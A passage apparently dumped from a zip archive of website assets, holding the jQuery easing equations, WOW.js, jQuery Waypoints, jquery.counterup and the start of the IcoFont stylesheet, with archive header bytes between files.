 *  EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE
 *  GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED 
 * AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
 *  NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED 
 * OF THE POSSIBILITY OF SUCH DAMAGE. 
 *
 */

// t: current time, b: begInnIng value, c: change In value, d: duration
jQuery.easing['jswing'] = jQuery.easing['swing'];

jQuery.extend(jQuery.easing, {
    def: 'easeOutQuad',
    swing: function (x, t, b, c, d) {
        //alert(jQuery.easing.default);
        return jQuery.easing[jQuery.easing.def](x, t, b, c, d);
    },
    easeInQuad: function (x, t, b, c, d) {
        return c * (t /= d) * t + b;
    },
    easeOutQuad: function (x, t, b, c, d) {
        return -c * (t /= d) * (t - 2) + b;
    },
    easeInOutQuad: function (x, t, b, c, d) {
        if ((t /= d / 2) < 1) return c / 2 * t * t + b;
        return -c / 2 * ((--t) * (t - 2) - 1) + b;
    },
    easeInCubic: function (x, t, b, c, d) {
        return c * (t /= d) * t * t + b;
    },
    easeOutCubic: function (x, t, b, c, d) {
        return c * ((t = t / d - 1) * t * t + 1) + b;
    },
    easeInOutCubic: function (x, t, b, c, d) {
        if ((t /= d / 2) < 1) return c / 2 * t * t * t + b;
        return c / 2 * ((t -= 2) * t * t + 2) + b;
    },
    easeInQuart: function (x, t, b, c, d) {
        return c * (t /= d) * t * t * t + b;
    },
    easeOutQuart: function (x, t, b, c, d) {
        return -c * ((t = t / d - 1) * t * t * t - 1) + b;
    },
    easeInOutQuart: function (x, t, b, c, d) {
        if ((t /= d / 2) < 1) return c / 2 * t * t * t * t + b;
        return -c / 2 * ((t -= 2) * t * t * t - 2) + b;
    },
    easeInQuint: function (x, t, b, c, d) {
        return c * (t /= d) * t * t * t * t + b;
    },
    easeOutQuint: function (x, t, b, c, d) {
        return c * ((t = t / d - 1) * t * t * t * t + 1) + b;
    },
    easeInOutQuint: function (x, t, b, c, d) {
        if ((t /= d / 2) < 1) return c / 2 * t * t * t * t * t + b;
        return c / 2 * ((t -= 2) * t * t * t * t + 2) + b;
    },
    easeInSine: function (x, t, b, c, d) {
        return -c * Math.cos(t / d * (Math.PI / 2)) + c + b;
    },
    easeOutSine: function (x, t, b, c, d) {
        return c * Math.sin(t / d * (Math.PI / 2)) + b;
    },
    easeInOutSine: function (x, t, b, c, d) {
        return -c / 2 * (Math.cos(Math.PI * t / d) - 1) + b;
    },
    easeInExpo: function (x, t, b, c, d) {
        return (t == 0) ? b : c * Math.pow(2, 10 * (t / d - 1)) + b;
    },
    easeOutExpo: function (x, t, b, c, d) {
        return (t == d) ? b + c : c * (-Math.pow(2, -10 * t / d) + 1) + b;
    },
    easeInOutExpo: function (x, t, b, c, d) {
        if (t == 0) return b;
        if (t == d) return b + c;
        if ((t /= d / 2) < 1) return c / 2 * Math.pow(2, 10 * (t - 1)) + b;
        return c / 2 * (-Math.pow(2, -10 * --t) + 2) + b;
    },
    easeInCirc: function (x, t, b, c, d) {
        return -c * (Math.sqrt(1 - (t /= d) * t) - 1) + b;
    },
    easeOutCirc: function (x, t, b, c, d) {
        return c * Math.sqrt(1 - (t = t / d - 1) * t) + b;
    },
    easeInOutCirc: function (x, t, b, c, d) {
        if ((t /= d / 2) < 1) return -c / 2 * (Math.sqrt(1 - t * t) - 1) + b;
        return c / 2 * (Math.sqrt(1 - (t -= 2) * t) + 1) + b;
    },
    easeInElastic: function (x, t, b, c, d) {
        var s = 1.70158;
        var p = 0;
        var a = c;
        if (t == 0) return b;
        if ((t /= d) == 1) return b + c;
        if (!p) p = d * .3;
        if (a < Math.abs(c)) {
            a = c;
            var s = p / 4;
        } else var s = p / (2 * Math.PI) * Math.asin(c / a);
        return -(a * Math.pow(2, 10 * (t -= 1)) * Math.sin((t * d - s) * (2 * Math.PI) / p)) + b;
    },
    easeOutElastic: function (x, t, b, c, d) {
        var s = 1.70158;
        var p = 0;
        var a = c;
        if (t == 0) return b;
        if ((t /= d) == 1) return b + c;
        if (!p) p = d * .3;
        if (a < Math.abs(c)) {
            a = c;
            var s = p / 4;
        } else var s = p / (2 * Math.PI) * Math.asin(c / a);
        return a * Math.pow(2, -10 * t) * Math.sin((t * d - s) * (2 * Math.PI) / p) + c + b;
    },
    easeInOutElastic: function (x, t, b, c, d) {
        var s = 1.70158;
        var p = 0;
        var a = c;
        if (t == 0) return b;
        if ((t /= d / 2) == 2) return b + c;
        if (!p) p = d * (.3 * 1.5);
        if (a < Math.abs(c)) {
            a = c;
            var s = p / 4;
        } else var s = p / (2 * Math.PI) * Math.asin(c / a);
        if (t < 1) return -.5 * (a * Math.pow(2, 10 * (t -= 1)) * Math.sin((t * d - s) * (2 * Math.PI) / p)) + b;
        return a * Math.pow(2, -10 * (t -= 1)) * Math.sin((t * d - s) * (2 * Math.PI) / p) * .5 + c + b;
    },
    easeInBack: function (x, t, b, c, d, s) {
        if (s == undefined) s = 1.70158;
        return c * (t /= d) * t * ((s + 1) * t - s) + b;
    },
    easeOutBack: function (x, t, b, c, d, s) {
        if (s == undefined) s = 1.70158;
        return c * ((t = t / d - 1) * t * ((s + 1) * t + s) + 1) + b;
    },
    easeInOutBack: function (x, t, b, c, d, s) {
        if (s == undefined) s = 1.70158;
        if ((t /= d / 2) < 1) return c / 2 * (t * t * (((s *= (1.525)) + 1) * t - s)) + b;
        return c / 2 * ((t -= 2) * t * (((s *= (1.525)) + 1) * t + s) + 2) + b;
    },
    easeInBounce: function (x, t, b, c, d) {
        return c - jQuery.easing.easeOutBounce(x, d - t, 0, c, d) + b;
    },
    easeOutBounce: function (x, t, b, c, d) {
        if ((t /= d) < (1 / 2.75)) {
            return c * (7.5625 * t * t) + b;
        } else if (t < (2 / 2.75)) {
            return c * (7.5625 * (t -= (1.5 / 2.75)) * t + .75) + b;
        } else if (t < (2.5 / 2.75)) {
            return c * (7.5625 * (t -= (2.25 / 2.75)) * t + .9375) + b;
        } else {
            return c * (7.5625 * (t -= (2.625 / 2.75)) * t + .984375) + b;
        }
    },
    easeInOutBounce: function (x, t, b, c, d) {
        if (t < d / 2) return jQuery.easing.easeInBounce(x, t * 2, 0, c, d) * .5 + b;
        return jQuery.easing.easeOutBounce(x, t * 2 - d, 0, c, d) * .5 + c * .5 + b;
    }
});

/*
 *
 * TERMS OF USE - EASING EQUATIONS
 * 
 * Open source under the BSD License. 
 * 
 * Copyright © 2001 Robert Penner
 * All rights reserved.
 * 
 * Redistribution and use in source and binary forms, with or without modification, 
 * are permitted provided that the following conditions are met:
 * 
 * Redistributions of source code must retain the above copyright notice, this list of 
 * conditions and the following disclaimer.
 * Redistributions in binary form must reproduce the above copyright notice, this list 
 * of conditions and the following disclaimer in the documentation and/or other materials 
 * provided with the distribution.
 * 
 * Neither the name of the author nor the names of contributors may be used to endorse 
 * or promote products derived from this software without specific prior written permission.
 * 
 * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY 
 * EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
 * MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
 *  COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
 *  EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE
 *  GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED 
 * AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
 *  NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED 
 * OF THE POSSIBILITY OF SUCH DAMAGE. 
 *
 */PK!�!�� � counterup/wow.min.jsnu&1i�/*! WOW - v1.1.3 - 2016-05-06
* Copyright (c) 2016 Matthieu Aussaguel;*/(function(){var a,b,c,d,e,f=function(a,b){return function(){return a.apply(b,arguments)}},g=[].indexOf||function(a){for(var b=0,c=this.length;c>b;b++)if(b in this&&this[b]===a)return b;return-1};b=function(){function a(){}return a.prototype.extend=function(a,b){var c,d;for(c in b)d=b[c],null==a[c]&&(a[c]=d);return a},a.prototype.isMobile=function(a){return/Android|webOS|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini/i.test(a)},a.prototype.createEvent=function(a,b,c,d){var e;return null==b&&(b=!1),null==c&&(c=!1),null==d&&(d=null),null!=document.createEvent?(e=document.createEvent("CustomEvent"),e.initCustomEvent(a,b,c,d)):null!=document.createEventObject?(e=document.createEventObject(),e.eventType=a):e.eventName=a,e},a.prototype.emitEvent=function(a,b){return null!=a.dispatchEvent?a.dispatchEvent(b):b in(null!=a)?a[b]():"on"+b in(null!=a)?a["on"+b]():void 0},a.prototype.addEvent=function(a,b,c){return null!=a.addEventListener?a.addEventListener(b,c,!1):null!=a.attachEvent?a.attachEvent("on"+b,c):a[b]=c},a.prototype.removeEvent=function(a,b,c){return null!=a.removeEventListener?a.removeEventListener(b,c,!1):null!=a.detachEvent?a.detachEvent("on"+b,c):delete a[b]},a.prototype.innerHeight=function(){return"innerHeight"in window?window.innerHeight:document.documentElement.clientHeight},a}(),c=this.WeakMap||this.MozWeakMap||(c=function(){function a(){this.keys=[],this.values=[]}return a.prototype.get=function(a){var b,c,d,e,f;for(f=this.keys,b=d=0,e=f.length;e>d;b=++d)if(c=f[b],c===a)return this.values[b]},a.prototype.set=function(a,b){var c,d,e,f,g;for(g=this.keys,c=e=0,f=g.length;f>e;c=++e)if(d=g[c],d===a)return void(this.values[c]=b);return this.keys.push(a),this.values.push(b)},a}()),a=this.MutationObserver||this.WebkitMutationObserver||this.MozMutationObserver||(a=function(){function a(){"undefined"!=typeof console&&null!==console&&console.warn("MutationObserver is not supported by your browser."),"undefined"!=typeof console&&null!==console&&console.warn("WOW.js cannot detect dom mutations, please call .sync() after loading new content.")}return a.notSupported=!0,a.prototype.observe=function(){},a}()),d=this.getComputedStyle||function(a,b){return this.getPropertyValue=function(b){var c;return"float"===b&&(b="styleFloat"),e.test(b)&&b.replace(e,function(a,b){return b.toUpperCase()}),(null!=(c=a.currentStyle)?c[b]:void 0)||null},this},e=/(\-([a-z]){1})/g,this.WOW=function(){function e(a){null==a&&(a={}),this.scrollCallback=f(this.scrollCallback,this),this.scrollHandler=f(this.scrollHandler,this),this.resetAnimation=f(this.resetAnimation,this),this.start=f(this.start,this),this.scrolled=!0,this.config=this.util().extend(a,this.defaults),null!=a.scrollContainer&&(this.config.scrollContainer=document.querySelector(a.scrollContainer)),this.animationNameCache=new c,this.wowEvent=this.util().createEvent(this.config.boxClass)}return e.prototype.defaults={boxClass:"wow",animateClass:"animated",offset:0,mobile:!0,live:!0,callback:null,scrollContainer:null},e.prototype.init=function(){var a;return this.element=window.document.documentElement,"interactive"===(a=document.readyState)||"complete"===a?this.start():this.util().addEvent(document,"DOMContentLoaded",this.start),this.finished=[]},e.prototype.start=function(){var b,c,d,e;if(this.stopped=!1,this.boxes=function(){var a,c,d,e;for(d=this.element.querySelectorAll("."+this.config.boxClass),e=[],a=0,c=d.length;c>a;a++)b=d[a],e.push(b);return e}.call(this),this.all=function(){var a,c,d,e;for(d=this.boxes,e=[],a=0,c=d.length;c>a;a++)b=d[a],e.push(b);return e}.call(this),this.boxes.length)if(this.disabled())this.resetStyle();else for(e=this.boxes,c=0,d=e.length;d>c;c++)b=e[c],this.applyStyle(b,!0);return this.disabled()||(this.util().addEvent(this.config.scrollContainer||window,"scroll",this.scrollHandler),this.util().addEvent(window,"resize",this.scrollHandler),this.interval=setInterval(this.scrollCallback,50)),this.config.live?new a(function(a){return function(b){var c,d,e,f,g;for(g=[],c=0,d=b.length;d>c;c++)f=b[c],g.push(function(){var a,b,c,d;for(c=f.addedNodes||[],d=[],a=0,b=c.length;b>a;a++)e=c[a],d.push(this.doSync(e));return d}.call(a));return g}}(this)).observe(document.body,{childList:!0,subtree:!0}):void 0},e.prototype.stop=function(){return this.stopped=!0,this.util().removeEvent(this.config.scrollContainer||window,"scroll",this.scrollHandler),this.util().removeEvent(window,"resize",this.scrollHandler),null!=this.interval?clearInterval(this.interval):void 0},e.prototype.sync=function(b){return a.notSupported?this.doSync(this.element):void 0},e.prototype.doSync=function(a){var b,c,d,e,f;if(null==a&&(a=this.element),1===a.nodeType){for(a=a.parentNode||a,e=a.querySelectorAll("."+this.config.boxClass),f=[],c=0,d=e.length;d>c;c++)b=e[c],g.call(this.all,b)<0?(this.boxes.push(b),this.all.push(b),this.stopped||this.disabled()?this.resetStyle():this.applyStyle(b,!0),f.push(this.scrolled=!0)):f.push(void 0);return f}},e.prototype.show=function(a){return this.applyStyle(a),a.className=a.className+" "+this.config.animateClass,null!=this.config.callback&&this.config.callback(a),this.util().emitEvent(a,this.wowEvent),this.util().addEvent(a,"animationend",this.resetAnimation),this.util().addEvent(a,"oanimationend",this.resetAnimation),this.util().addEvent(a,"webkitAnimationEnd",this.resetAnimation),this.util().addEvent(a,"MSAnimationEnd",this.resetAnimation),a},e.prototype.applyStyle=function(a,b){var c,d,e;return d=a.getAttribute("data-wow-duration"),c=a.getAttribute("data-wow-delay"),e=a.getAttribute("data-wow-iteration"),this.animate(function(f){return function(){return f.customStyle(a,b,d,c,e)}}(this))},e.prototype.animate=function(){return"requestAnimationFrame"in window?function(a){return window.requestAnimationFrame(a)}:function(a){return a()}}(),e.prototype.resetStyle=function(){var a,b,c,d,e;for(d=this.boxes,e=[],b=0,c=d.length;c>b;b++)a=d[b],e.push(a.style.visibility="visible");return e},e.prototype.resetAnimation=function(a){var b;return a.type.toLowerCase().indexOf("animationend")>=0?(b=a.target||a.srcElement,b.className=b.className.replace(this.config.animateClass,"").trim()):void 0},e.prototype.customStyle=function(a,b,c,d,e){return b&&this.cacheAnimationName(a),a.style.visibility=b?"hidden":"visible",c&&this.vendorSet(a.style,{animationDuration:c}),d&&this.vendorSet(a.style,{animationDelay:d}),e&&this.vendorSet(a.style,{animationIterationCount:e}),this.vendorSet(a.style,{animationName:b?"none":this.cachedAnimationName(a)}),a},e.prototype.vendors=["moz","webkit"],e.prototype.vendorSet=function(a,b){var c,d,e,f;d=[];for(c in b)e=b[c],a[""+c]=e,d.push(function(){var b,d,g,h;for(g=this.vendors,h=[],b=0,d=g.length;d>b;b++)f=g[b],h.push(a[""+f+c.charAt(0).toUpperCase()+c.substr(1)]=e);return h}.call(this));return d},e.prototype.vendorCSS=function(a,b){var c,e,f,g,h,i;for(h=d(a),g=h.getPropertyCSSValue(b),f=this.vendors,c=0,e=f.length;e>c;c++)i=f[c],g=g||h.getPropertyCSSValue("-"+i+"-"+b);return g},e.prototype.animationName=function(a){var b;try{b=this.vendorCSS(a,"animation-name").cssText}catch(c){b=d(a).getPropertyValue("animation-name")}return"none"===b?"":b},e.prototype.cacheAnimationName=function(a){return this.animationNameCache.set(a,this.animationName(a))},e.prototype.cachedAnimationName=function(a){return this.animationNameCache.get(a)},e.prototype.scrollHandler=function(){return this.scrolled=!0},e.prototype.scrollCallback=function(){var a;return!this.scrolled||(this.scrolled=!1,this.boxes=function(){var b,c,d,e;for(d=this.boxes,e=[],b=0,c=d.length;c>b;b++)a=d[b],a&&(this.isVisible(a)?this.show(a):e.push(a));return e}.call(this),this.boxes.length||this.config.live)?void 0:this.stop()},e.prototype.offsetTop=function(a){for(var b;void 0===a.offsetTop;)a=a.parentNode;for(b=a.offsetTop;a=a.offsetParent;)b+=a.offsetTop;return b},e.prototype.isVisible=function(a){var b,c,d,e,f;return c=a.getAttribute("data-wow-offset")||this.config.offset,f=this.config.scrollContainer&&this.config.scrollContainer.scrollTop||window.pageYOffset,e=f+Math.min(this.element.clientHeight,this.util().innerHeight())-c,d=this.offsetTop(a),b=d+a.clientHeight,e>=d&&b>=f},e.prototype.util=function(){return null!=this._util?this._util:this._util=new b},e.prototype.disabled=function(){return!this.config.mobile&&this.util().isMobile(navigator.userAgent)},e}()}).call(this);PK!�llcounterup/jquery.waypoints.jsnu&1i�// Generated by CoffeeScript 1.6.2
/*
jQuery Waypoints - v2.0.3
Copyright (c) 2011-2013 Caleb Troughton
Dual licensed under the MIT license and GPL license.
https://github.com/imakewebthings/jquery-waypoints/blob/master/licenses.txt
*/
(function(){var t=[].indexOf||function(t){for(var e=0,n=this.length;e<n;e++){if(e in this&&this[e]===t)return e}return-1},e=[].slice;(function(t,e){if(typeof define==="function"&&define.amd){return define("waypoints",["jquery"],function(n){return e(n,t)})}else{return e(t.jQuery,t)}})(this,function(n,r){var i,o,l,s,f,u,a,c,h,d,p,y,v,w,g,m;i=n(r);c=t.call(r,"ontouchstart")>=0;s={horizontal:{},vertical:{}};f=1;a={};u="waypoints-context-id";p="resize.waypoints";y="scroll.waypoints";v=1;w="waypoints-waypoint-ids";g="waypoint";m="waypoints";o=function(){function t(t){var e=this;this.$element=t;this.element=t[0];this.didResize=false;this.didScroll=false;this.id="context"+f++;this.oldScroll={x:t.scrollLeft(),y:t.scrollTop()};this.waypoints={horizontal:{},vertical:{}};t.data(u,this.id);a[this.id]=this;t.bind(y,function(){var t;if(!(e.didScroll||c)){e.didScroll=true;t=function(){e.doScroll();return e.didScroll=false};return r.setTimeout(t,n[m].settings.scrollThrottle)}});t.bind(p,function(){var t;if(!e.didResize){e.didResize=true;t=function(){n[m]("refresh");return e.didResize=false};return r.setTimeout(t,n[m].settings.resizeThrottle)}})}t.prototype.doScroll=function(){var t,e=this;t={horizontal:{newScroll:this.$element.scrollLeft(),oldScroll:this.oldScroll.x,forward:"right",backward:"left"},vertical:{newScroll:this.$element.scrollTop(),oldScroll:this.oldScroll.y,forward:"down",backward:"up"}};if(c&&(!t.vertical.oldScroll||!t.vertical.newScroll)){n[m]("refresh")}n.each(t,function(t,r){var i,o,l;l=[];o=r.newScroll>r.oldScroll;i=o?r.forward:r.backward;n.each(e.waypoints[t],function(t,e){var n,i;if(r.oldScroll<(n=e.offset)&&n<=r.newScroll){return l.push(e)}else if(r.newScroll<(i=e.offset)&&i<=r.oldScroll){return l.push(e)}});l.sort(function(t,e){return t.offset-e.offset});if(!o){l.reverse()}return n.each(l,function(t,e){if(e.options.continuous||t===l.length-1){return e.trigger([i])}})});return this.oldScroll={x:t.horizontal.newScroll,y:t.vertical.newScroll}};t.prototype.refresh=function(){var t,e,r,i=this;r=n.isWindow(this.element);e=this.$element.offset();this.doScroll();t={horizontal:{contextOffset:r?0:e.left,contextScroll:r?0:this.oldScroll.x,contextDimension:this.$element.width(),oldScroll:this.oldScroll.x,forward:"right",backward:"left",offsetProp:"left"},vertical:{contextOffset:r?0:e.top,contextScroll:r?0:this.oldScroll.y,contextDimension:r?n[m]("viewportHeight"):this.$element.height(),oldScroll:this.oldScroll.y,forward:"down",backward:"up",offsetProp:"top"}};return n.each(t,function(t,e){return n.each(i.waypoints[t],function(t,r){var i,o,l,s,f;i=r.options.offset;l=r.offset;o=n.isWindow(r.element)?0:r.$element.offset()[e.offsetProp];if(n.isFunction(i)){i=i.apply(r.element)}else if(typeof i==="string"){i=parseFloat(i);if(r.options.offset.indexOf("%")>-1){i=Math.ceil(e.contextDimension*i/100)}}r.offset=o-e.contextOffset+e.contextScroll-i;if(r.options.onlyOnScroll&&l!=null||!r.enabled){return}if(l!==null&&l<(s=e.oldScroll)&&s<=r.offset){return r.trigger([e.backward])}else if(l!==null&&l>(f=e.oldScroll)&&f>=r.offset){return r.trigger([e.forward])}else if(l===null&&e.oldScroll>=r.offset){return r.trigger([e.forward])}})})};t.prototype.checkEmpty=function(){if(n.isEmptyObject(this.waypoints.horizontal)&&n.isEmptyObject(this.waypoints.vertical)){this.$element.unbind([p,y].join(" "));return delete a[this.id]}};return t}();l=function(){function t(t,e,r){var i,o;r=n.extend({},n.fn[g].defaults,r);if(r.offset==="bottom-in-view"){r.offset=function(){var t;t=n[m]("viewportHeight");if(!n.isWindow(e.element)){t=e.$element.height()}return t-n(this).outerHeight()}}this.$element=t;this.element=t[0];this.axis=r.horizontal?"horizontal":"vertical";this.callback=r.handler;this.context=e;this.enabled=r.enabled;this.id="waypoints"+v++;this.offset=null;this.options=r;e.waypoints[this.axis][this.id]=this;s[this.axis][this.id]=this;i=(o=t.data(w))!=null?o:[];i.push(this.id);t.data(w,i)}t.prototype.trigger=function(t){if(!this.enabled){return}if(this.callback!=null){this.callback.apply(this.element,t)}if(this.options.triggerOnce){return this.destroy()}};t.prototype.disable=function(){return this.enabled=false};t.prototype.enable=function(){this.context.refresh();return this.enabled=true};t.prototype.destroy=function(){delete s[this.axis][this.id];delete this.context.waypoints[this.axis][this.id];return this.context.checkEmpty()};t.getWaypointsByElement=function(t){var e,r;r=n(t).data(w);if(!r){return[]}e=n.extend({},s.horizontal,s.vertical);return n.map(r,function(t){return e[t]})};return t}();d={init:function(t,e){var r;if(e==null){e={}}if((r=e.handler)==null){e.handler=t}this.each(function(){var t,r,i,s;t=n(this);i=(s=e.context)!=null?s:n.fn[g].defaults.context;if(!n.isWindow(i)){i=t.closest(i)}i=n(i);r=a[i.data(u)];if(!r){r=new o(i)}return new l(t,r,e)});n[m]("refresh");return this},disable:function(){return d._invoke(this,"disable")},enable:function(){return d._invoke(this,"enable")},destroy:function(){return d._invoke(this,"destroy")},prev:function(t,e){return d._traverse.call(this,t,e,function(t,e,n){if(e>0){return t.push(n[e-1])}})},next:function(t,e){return d._traverse.call(this,t,e,function(t,e,n){if(e<n.length-1){return t.push(n[e+1])}})},_traverse:function(t,e,i){var o,l;if(t==null){t="vertical"}if(e==null){e=r}l=h.aggregate(e);o=[];this.each(function(){var e;e=n.inArray(this,l[t]);return i(o,e,l[t])});return this.pushStack(o)},_invoke:function(t,e){t.each(function(){var t;t=l.getWaypointsByElement(this);return n.each(t,function(t,n){n[e]();return true})});return this}};n.fn[g]=function(){var t,r;r=arguments[0],t=2<=arguments.length?e.call(arguments,1):[];if(d[r]){return d[r].apply(this,t)}else if(n.isFunction(r)){return d.init.apply(this,arguments)}else if(n.isPlainObject(r)){return d.init.apply(this,[null,r])}else if(!r){return n.error("jQuery Waypoints needs a callback function or handler option.")}else{return n.error("The "+r+" method does not exist in jQuery Waypoints.")}};n.fn[g].defaults={context:r,continuous:true,enabled:true,horizontal:false,offset:0,triggerOnce:false};h={refresh:function(){return n.each(a,function(t,e){return e.refresh()})},viewportHeight:function(){var t;return(t=r.innerHeight)!=null?t:i.height()},aggregate:function(t){var e,r,i;e=s;if(t){e=(i=a[n(t).data(u)])!=null?i.waypoints:void 0}if(!e){return[]}r={horizontal:[],vertical:[]};n.each(r,function(t,i){n.each(e[t],function(t,e){return i.push(e)});i.sort(function(t,e){return t.offset-e.offset});r[t]=n.map(i,function(t){return t.element});return r[t]=n.unique(r[t])});return r},above:function(t){if(t==null){t=r}return h._filter(t,"vertical",function(t,e){return e.offset<=t.oldScroll.y})},below:function(t){if(t==null){t=r}return h._filter(t,"vertical",function(t,e){return e.offset>t.oldScroll.y})},left:function(t){if(t==null){t=r}return h._filter(t,"horizontal",function(t,e){return e.offset<=t.oldScroll.x})},right:function(t){if(t==null){t=r}return h._filter(t,"horizontal",function(t,e){return e.offset>t.oldScroll.x})},enable:function(){return h._invoke("enable")},disable:function(){return h._invoke("disable")},destroy:function(){return h._invoke("destroy")},extendFn:function(t,e){return d[t]=e},_invoke:function(t){var e;e=n.extend({},s.vertical,s.horizontal);return n.each(e,function(e,n){n[t]();return true})},_filter:function(t,e,r){var i,o;i=a[n(t).data(u)];if(!i){return[]}o=[];n.each(i.waypoints[e],function(t,e){if(r(i,e)){return o.push(e)}});o.sort(function(t,e){return t.offset-e.offset});return n.map(o,function(t){return t.element})}};n[m]=function(){var t,n;n=arguments[0],t=2<=arguments.length?e.call(arguments,1):[];if(h[n]){return h[n].apply(null,t)}else{return h.aggregate.call(null,n)}};n[m].settings={resizeThrottle:100,scrollThrottle:30};return i.load(function(){return n[m]("refresh")})})}).call(this);PK![i++!counterup/jquery.counterup.min.jsnu&1i�/*!
* jquery.counterup.js 1.0
*
* Copyright 2013, Benjamin Intal http://gambit.ph @bfintal
* Released under the GPL v2 License
*
* Date: Nov 26, 2013
*/(function(e){"use strict";e.fn.counterUp=function(t){var n=e.extend({time:400,delay:10},t);return this.each(function(){var t=e(this),r=n,i=function(){var e=[],n=r.time/r.delay,i=t.text(),s=/[0-9]+,[0-9]+/.test(i);i=i.replace(/,/g,"");var o=/^[0-9]+$/.test(i),u=/^[0-9]+\.[0-9]+$/.test(i),a=u?(i.split(".")[1]||[]).length:0;for(var f=n;f>=1;f--){var l=parseInt(i/n*f);u&&(l=parseFloat(i/n*f).toFixed(a));if(s)while(/(\d+)(\d{3})/.test(l.toString()))l=l.toString().replace(/(\d+)(\d{3})/,"$1,$2");e.unshift(l)}t.data("counterup-nums",e);t.text("0");var c=function(){t.text(t.data("counterup-nums").shift());if(t.data("counterup-nums").length)setTimeout(t.data("counterup-func"),r.delay);else{delete t.data("counterup-nums");t.data("counterup-nums",null);t.data("counterup-func",null)}};t.data("counterup-func",c);setTimeout(t.data("counterup-func"),r.delay)};t.waypoint(i,{offset:"100%",triggerOnce:!0})})}})(jQuery);PK!L��0h0hicofont/icofont.min.cssnu&1i�/*! 
* @package IcoFont 
* @version 1.0.1 
* @author IcoFont https://icofont.com 
* @copyright Copyright (c) 2015 - 2018 IcoFont 
* @license - https://icofont.com/license/
*/@font-face{font-family:IcoFont;font-weight:400;font-style:Regular;src:url(fonts/icofont.woff2) format("woff2"),url(fonts/icofont.woff) format("woff")}[class*=" icofont-"],[class^=icofont-]{font-family:IcoFont!important;speak:none;font-style:normal;font-weight:400;font-variant:normal;text-transform:none;white-space:nowrap;word-wrap:normal;direction:ltr;line-height:1;-webkit-font-feature-settings:"liga";-webkit-font-smoothing:antialiased}.icofont-angry-monster:before{content:"\e800"}.icofont-bathtub:before{content:"\e801"}.icofont-bird-wings:before{content:"\e802"}.icofont-bow:before{content:"\e803"}.icofont-castle:before{content:"\e804"}.icofont-circuit:before{content:"\e805"}.icofont-crown-king:before{content:"\e806"}.icofont-crown-queen:before{content:"\e807"}.icofont-dart:before{content:"\e808"}.icofont-disability-race:before{content:"\e809"}.icofont-diving-goggle:before{content:"\e80a"}.icofont-eye-open:before{content:"\e80b"}.icofont-flora-flower:before{content:"\e80c"}.icofont-flora:before{content:"\e80d"}.icofont-gift-box:before{content:"\e80e"}.icofont-halloween-pumpkin:before{content:"\e80f"}.icofont-hand-power:before{content:"\e810"}.icofont-hand-thunder:before{content:"\e811"}.icofont-king-monster:before{content:"\e812"}.icofont-love:before{content:"\e813"}.icofont-magician-hat:before{content:"\e814"}.icofont-native-american:before{content:"\e815"}.icofont-owl-look:before{content:"\e816"}.icofont-phoenix:before{content:"\e817"}.icofont-robot-face:before{content:"\e818"}.icofont-sand-clock:before{content:"\e819"}.icofont-shield-alt:before{content:"\e81a"}.icofont-ship-wheel:before{content:"\e81b"}.icofont-skull-danger:before{content:"\e81c"}.icofont-skull-face:before{content:"\e81d"}.icofont-snowmobile:before{content:"\e81e"}.icofont-space-shuttle:before{content:"\e81f"}.icofont-star-shape:before{content:"\e820"}.icofont-swirl:before{content:"\e821"}.icofont-tattoo-wing:before{content:"\e822"}.icofont-throne:before{content:"\e823"}.icofont-tree-alt:before{content:"\e824"}.icofont-triangle:before{content:"\e825"}.icofont-unity-hand:before{content:"\e826"}.icofont-weed:before{content:"\e827"}.icofont-woman-bird:before{content:"\e828"}.icofont-bat:before{content:"\e829"}.icofont-bear-face:before{content:"\e82a"}.icofont-bear-tracks:before{content:"\e82b"}.icofont-bear:before{content:"\e82c"}.icofont-bird-alt:before{content:"\e82d"}.icofont-bird-flying:before{content:"\e82e"}.icofont-bird:before{content:"\e82f"}.icofont-birds:before{content:"\e830"}.icofont-bone:before{content:"\e831"}.icofont-bull:before{content:"\e832"}.icofont-butterfly-alt:before{content:"\e833"}.icofont-butterfly:before{content:"\e834"}.icofont-camel-alt:before{content:"\e835"}.icofont-camel-head:before{content:"\e836"}.icofont-camel:before{content:"\e837"}.icofont-cat-alt-1:before{content:"\e838"}.icofont-cat-alt-2:before{content:"\e839"}.icofont-cat-alt-3:before{content:"\e83a"}.icofont-cat-dog:before{content:"\e83b"}.icofont-cat-face:before{content:"\e83c"}.icofont-cat:before{content:"\e83d"}.icofont-cow-head:before{content:"\e83e"}.icofont-cow:before{content:"\e83f"}.icofont-crab:before{content:"\e840"}.icofont-crocodile:before{content:"\e841"}.icofont-deer-head:before{content:"\e842"}.icofont-dog-alt:before{content:"\e843"}.icofont-dog-barking:before{content:"\e844"}.icofont-dog:before{content:"\e845"}.icofont-dolphin:before{content:"\e846"}.icofont-duck-tracks:before{content:"\e847"}.icofont-eagle-head:before{content:"\e848"}.icofont-eaten-fish:before{content:"\e849"}.icofont-elephant-alt:before{content:"\e84a"}.icofont-elephant-head-alt:before{content:"\e84b"}.icofont-elephant-head:before{content:"\e84c"}.icofont-elephant:before{content:"\e84d"}.icofont-elk:before{content:"\e84e"}.icofont-fish-1:before{content:"\e84f"}.icofont-fish-2:before{content:"\e850"}.icofont-fish-3:before{content:"\e851"}.icofont-fish-4:before{content:"\e852"}.icofont-fish-5:before{content:"\e853"}.icofont-fish:before{con